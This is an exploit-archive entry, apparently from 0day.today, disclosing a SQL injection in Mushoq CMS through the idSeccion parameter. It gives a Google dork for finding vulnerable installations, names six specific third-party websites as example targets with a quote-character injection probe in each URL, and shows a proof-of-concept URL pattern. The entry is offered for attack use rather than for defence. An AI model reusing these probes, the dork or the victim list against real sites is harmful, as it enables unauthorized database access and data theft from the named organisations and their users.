Mushoq CMS SQL injection Vulnerability

2012-04-21T00:00:00
ID 1337DAY-ID-18096
Type zdt
Reporter xDarkSton3x
Modified 2012-04-21T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ##################################################
# Exploit Title: Mushoq CMS SQL injection Vulnerability
# Vendor: http://www.mushoq.com/
# Author: xDarkSton3x
# E-mail : [email protected]
#Twitter: @xdarkston3x
# Category: webapps
# Google dork: intext:desarrollo Web mushoq inurl:index.php?idSeccion=
# Example Sites : 
http://www.clave.com.ec/index.php?idSeccion=%27
http://www.edesa.com.ec/index.php?idSeccion=%27
http://www.rvc.com.ec/index.php?idSeccion=%27
http://www.cip.org.ec/index.php?idSeccion=%27
http://www.cgbseguridad.com/index.php?idSeccion=%27
http://www.verdesintetico.com/index.php?idSeccion=%27

##################################################

[~]Exploit/p0c :
http://www.site.com/index.php?idSeccion=[sqli]

Greetz [ Rs4 - B4nz0k - FailRoot - FailSoft - W4rn1ng] 



#  0day.today [2018-01-05]  #